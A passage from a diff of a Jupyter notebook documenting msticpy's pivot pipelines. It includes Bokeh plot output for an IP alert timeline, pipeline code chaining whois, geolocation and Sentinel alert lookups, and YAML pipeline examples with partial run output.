RQFXh3QgAAsg4jeHdCAABkxzB4d0IAADSlN3h3QgAAFhU7eHdCAADcnB94d0IAANRgRXh3QgCA6nomeHdCAAAGwBh4d0IAgNLpKXh3QgAAJz5MeHdCAIANNjR4d0IAAASDPnh3QgAA7PFBeHdCAIB30Eh4d0IAgAX6WXh3QgCA7WhdeHdCAIBNrU94d0IAgDUcU3h3QgCAHYtWeHdCAAAU2GB4d0IAgHWTbnh3QgAADJyGeHdCAIC9RmR4d0IAgKW1Z3h3QgCAFU98eHdCAACUxpd4d0IAgF0Ccnh3QgCAjSRreHdCAAAHcXV4d0IAgLo1m3h3QgCA/b1/eHdCAICipJ54d0IAgJ15jXh3QgAAxOiQeHdCAIAt4Hh4d0IAgOUsg3h3QgCADROieHdCAIC1Cop4d0IAgN3wqHh3QgCAbVeUeHdCAID1gaV4d0IAgP39BGh3QgCA/f0EaHdCAID9/QRod0IAgP39BGh3QgCAWNQFaHdCAID9/QRod0IAgP39BGh3QgCA/f0EaHdCAID9/QRod0IAgP39BGh3QgCA/f0EaHdCAID9/QRod0IAgP39BGh3QgCA/f0EaHdCAID9/QRod0IAgFjUBWh3QgCAWNQFaHdCAIBY1AVod0IAgFjUBWh3QgCAWNQFaHdCAIBY1AVod0IAgFjUBWh3QgCAWNQFaHdCAIBY1AVod0IAgFjUBWh3QgCAWNQFaHdCAIBY1AVod0IAgFjUBWh3QgCAWNQFaHdCAAChxotod0IAAFBba2h3QgAAocaLaHdCAAChxotod0IAAKHGi2h3QgAAocaLaHdCAAChxotod0IAAKHGi2h3QgAAocaLaHdCAAChxotod0IAAKHGi2h3QgAAocaLaHdCAAChxotod0IAAKHGi2h3QgAAocaLaHdCAIDdn4N2d0IAALxbkXZ3QgAAZFN5dndCAIBVdXJ2d0IAAPnkdXZ3QgAAvH4jdndCAADZOjF2d0IAgEUgUHZ3QgAA1A8gdndCAIBl7SZ2d0IAgI3TRXZ3QgAAtEJJdndCAACcsUx2d0IAgPUwgHZ3QgAABA+HdndCAICtfYp2d0IAAIxcKnZ3QgCAHRefdndCAIAFhqJ2d0IAgO30pXZ3QgCApUGwdndCAAB0yy12d0IAAESpNHZ3QgCAtblkdndCAAAsGDh2d0IAAMSXa3Z3QgAAJNxddndCAIDVhjt2d0IAAPz1PnZ3QgCA6gZvdndCAIClZEJ2d0IAgA3CfHZ3QgAAtB+3dndCAIC90qx2d0IAgC1swXZ3QgCAEu2NdndCAIAtj1N2d0IAAFT+VnZ3QgCAZcqUdndCAIBNOZh2d0IAgDWom3Z3QgCA1WOpdndCAICNsLN2d0IAgF2OunZ3QgCARf29dndCAAA8bVp2d0IAAAxLYXZ3QgAA3ChodndC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[990]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,866,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,899,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,918,919,920,921,922,923,924,925,926,927,928,929,930,931,932,933,934,935,936,937,938,939,940,941,942,943,944,945,946,947,948,949,950,951,952,953,954,955,956,957,958,959,960,961,962,963,964,965,966,967,968,969,970,971,972,973,974,975,976,977,978,979,980,981,982,983,984,985,986,987,988,989],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"1079\"},\"selection_policy\":{\"id\":\"1080\"}},\"id\":\"1002\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1027\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1079\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1045\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1065\"},\"ticker\":{\"id\":\"1016\"}},\"id\":\"1015\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1080\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1089\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1071\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1103\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1037\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1090\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1095\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1065\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1087\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1097\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1075\"},\"ticker\":{\"id\":\"1020\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1088\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1099\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1613705627333.6,\"start\":1607294522242.4},\"id\":\"1007\",\"type\":\"Range1d\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1052\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"LinearScale\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1056\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1057\"},\"selection_glyph\":null,\"view\":{\"id\":\"1059\"}},\"id\":\"1058\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1102\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis\":{\"id\":\"1047\"},\"ticker\":null},\"id\":\"1050\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1053\"},\"ticker\":{\"id\":\"1048\"}},\"id\":\"1047\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1100\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\"},\"glyph\":{\"id\":\"1068\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1069\"},\"selection_glyph\":null,\"view\":{\"id\":\"1071\"}},\"id\":\"1070\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1003\"},{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"}]},\"id\":\"1029\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1075\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1101\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1059\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1091\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1061\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"text\":\"Timeline: IPs with alerts\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{\"axis\":{\"id\":\"1019\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1022\",\"type\":\"Grid\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"AlertName\",\"@AlertName\"],[\"MatchingIps\",\"@MatchingIps\"]]},\"id\":\"1003\",\"type\":\"HoverTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1023\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"start\":-1.0},\"id\":\"1009\",\"type\":\"Range1d\"},{\"attributes\":{\"fill_color\":{\"value\":\"navy\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1056\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1053\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1095\"},{\"id\":\"1096\"},{\"id\":\"1097\"},{\"id\":\"1098\"},{\"id\":\"1099\"},{\"id\":\"1100\"},{\"id\":\"1101\"},{\"id\":\"1102\"},{\"id\":\"1103\"},{\"id\":\"1104\"},{\"id\":\"1105\"},{\"id\":\"1106\"}]},\"id\":\"1048\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1041\",\"type\":\"DataRange1d\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1083\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1086\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1060\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1060\"}]},\"id\":\"1051\",\"type\":\"Toolbar\"},{\"attributes\":{\"overlay\":{\"id\":\"1061\"},\"x_range\":{\"id\":\"1007\"},\"y_range\":null},\"id\":\"1060\",\"type\":\"RangeTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1104\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1028\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1082\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1057\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1085\",\"type\":\"DaysTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1028\"}},\"id\":\"1024\",\"type\":\"BoxZoomTool\"}],\"root_ids\":[\"1072\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n",
+       "  var render_items = [{\"docid\":\"1fff9a48-6d80-4c53-ab13-9e3c590b6a98\",\"root_ids\":[\"1072\"],\"roots\":{\"1072\":\"9c3815e8-e651-4c62-b575-428caed055ec\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1072"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "(\n",
+    "    ips_df\n",
+    "    .mp_pivot.run(entities.IpAddress.util.ip_type, column=\"IP\", join=\"inner\")\n",
+    "    .query(\"result == 'Public'\").head(5)\n",
+    "    .mp_pivot.run(entities.IpAddress.util.whois, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.run(entities.IpAddress.util.geoloc, column=\"ip\", join=\"left\")\n",
+    "    .mp_pivot.display(title=\"Geo Lookup\", cols=[\"IP\", \"City\"])  # << display an intermediate result\n",
+    "    .mp_pivot.run(entities.IpAddress.AzureSentinel.SecurityAlert_list_alerts_for_ip, source_ip_list=\"ip\")\n",
+    "    .mp_pivot.display(title=\"Alerts Sample\", head=5) \n",
+    "    .mp_timeline.plot(\n",
+    "        title=\"IPs with alerts\",\n",
+    "        source_columns=[\"AlertName\", \"MatchingIps\"],\n",
+    "    )\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<h3 style=\"color: red\">Post-0.9.0 feature</h>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Saving and re-using pipelines as yaml\n",
+    "\n",
+    "You can specify a pipeline using YAML syntax and execute directly with\n",
+    "a DataFrame input.\n",
+    "\n",
+    "Here is an example pipeline file with two pipelines, each with multiple\n",
+    "steps.\n",
+    "\n",
+    "```yaml\n",
+    "pipelines:\n",
+    "  pipeline1:\n",
+    "    description: Pipeline 1 description\n",
+    "    steps:\n",
+    "      - name: get_logons\n",
+    "        step_type: pivot\n",
+    "        function: util.whois\n",
+    "        entity: IpAddress\n",
+    "        comment: Standard pivot function\n",
+    "        params:\n",
+    "          column: IpAddress\n",
+    "          join: inner\n",
+    "      - name: disp_logons\n",
+    "        step_type: pivot_display\n",
+    "        comment: Pivot display\n",
+    "        params:\n",
+    "          title: \"The title\"\n",
+    "          cols:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "          query: Computer.str.startswith('MSTICAlerts')\n",
+    "          head: 10\n",
+    "      - name: tee_logons\n",
+    "        step_type: pivot_tee\n",
+    "        comment: Pivot tee\n",
+    "        params:\n",
+    "          var_name: var_df\n",
+    "          clobber: True\n",
+    "      - name: tee_logons_disp\n",
+    "        step_type: pivot_tee_exec\n",
+    "        comment: Pivot tee_exec with mp_timeline.plot\n",
+    "        function: mp_timeline.plot\n",
+    "        params:\n",
+    "          source_columns:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "      - name: logons_timeline\n",
+    "        step_type: pd_accessor\n",
+    "        comment: Standard accessor with mp_timeline.plot\n",
+    "        function: mp_timeline.plot\n",
+    "        params:\n",
+    "          source_columns:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "  pipeline2:\n",
+    "    description: Pipeline 2 description\n",
+    "    steps:\n",
+    "      - name: get_logons\n",
+    "        step_type: pivot\n",
+    "        function: util.whois\n",
+    "        entity: IpAddress\n",
+    "        comment: Standard pivot function\n",
+    "        params:\n",
+    "          column: IpAddress\n",
+    "          join: inner\n",
+    "      - name: disp_logons\n",
+    "        step_type: pivot_display\n",
+    "        comment: Pivot display\n",
+    "        params:\n",
+    "          title: \"The title\"\n",
+    "          cols:\n",
+    "              - Computer\n",
+    "              - Account\n",
+    "          query: Computer.str.startswith('MSTICAlerts')\n",
+    "          head: 10\n",
+    "      - name: tee_logons\n",
+    "        step_type: pivot_tee\n",
+    "        comment: Pivot tee\n",
+    "        params:\n",
+    "          var_name: var_df\n",
+    "          clobber: True\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Create a sample YAML pipeline"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 59,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.datamodel.pivot_pipeline import Pipeline\n",
+    "\n",
+    "pipelines_yml = \"\"\"\n",
+    "pipelines:\n",
+    "  pipeline1:\n",
+    "    description: Pipeline 1 description\n",
+    "    steps:\n",
+    "      - name: get_ip_type\n",
+    "        step_type: pivot\n",
+    "        function: util.ip_type\n",
+    "        entity: IpAddress\n",
+    "        comment: Get IP Type\n",
+    "        params:\n",
+    "          column: IP\n",
+    "          join: inner\n",
+    "      - name: filter_public\n",
+    "        step_type: pd_accessor\n",
+    "        comment: Filter to only public IPs\n",
+    "        function: query\n",
+    "        pos_params:\n",
+    "          - result == \"Public\"\n",
+    "      - name: whois\n",
+    "        step_type: pivot\n",
+    "        function: util.whois\n",
+    "        entity: IpAddress\n",
+    "        comment: Get Whois info\n",
+    "        params:\n",
+    "          column: IP\n",
+    "          join: inner\n",
+    "      \n",
+    "\"\"\""
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Qe can store this in a file:\n",
+    "\n",
+    "```python\n",
+    "with open(\"pipelines.yml\", \"w\") as fh:\n",
+    "    fh.write(pipelines_yml)\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Load the pipeline and print out what it would look like in code"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 64,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "# Pipeline 1 description\n",
+      "(\n",
+      "    input_df\n",
+      "    # Get IP Type\n",
+      "    .mp_pivot.run(IpAddress.util.ip_type, column='IP', join='inner')\n",
+      "    # Filter to only public IPs\n",
+      "    .query('result == \"Public\"')\n",
+      "    # Get Whois info\n",
+      "    .mp_pivot.run(IpAddress.util.whois, column='IP', join='inner')\n",
+      ")\n"
+     ]
+    }
+   ],
+   "source": [
+    "pipelines = list(Pipeline.from_yaml(pipelines_yml))\n",
+    "print(pipelines[0].print_pipeline())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Run the pipeline"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 65,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "21a927dcc9364c13999cf929078b9506",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Steps:   0%|          | 0/3 [00:00<?, ?it/s]"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "step = get_ip_type \n",
+      " PipelineExecStep(accessor='mp_pivot.run', pos_params=[], params={'func': <function get_ip_type at 0x0000028BAFA17048>, 'column': 'IP', 'join': 'inner'}, text=\".mp_pivot.run(IpAddress.util.ip_type, column='IP', join='inner')\", comment='Get IP Type')\n",
+      "step = filter_public \n",
+      " PipelineExecStep(accessor='query', pos_params=['result == \"Public\"'], params={}, text='.query(\\'result == \"Public\"\\')', comment='Filter to only public IPs')\n",
+      "step = whois \n",
+      " PipelineExecStep(accessor='mp_pivot.run', pos_params=[], params={'func': <function get_whois_df at 0x0000028BAFA89F78>, 'column': 'IP', 'join': 'inner'}, text=\".mp_pivot.run(IpAddress.util.whois, column='IP', join='inner')\", comment='Get Whois info')\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IP</th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>query</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>3.88.48.125</td>\n",
+       "      <td>Public</td>\n",
+       "      <td>14618</td>\n",
+       "      <td>3.80.0.0/12</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-12-20</td>\n",
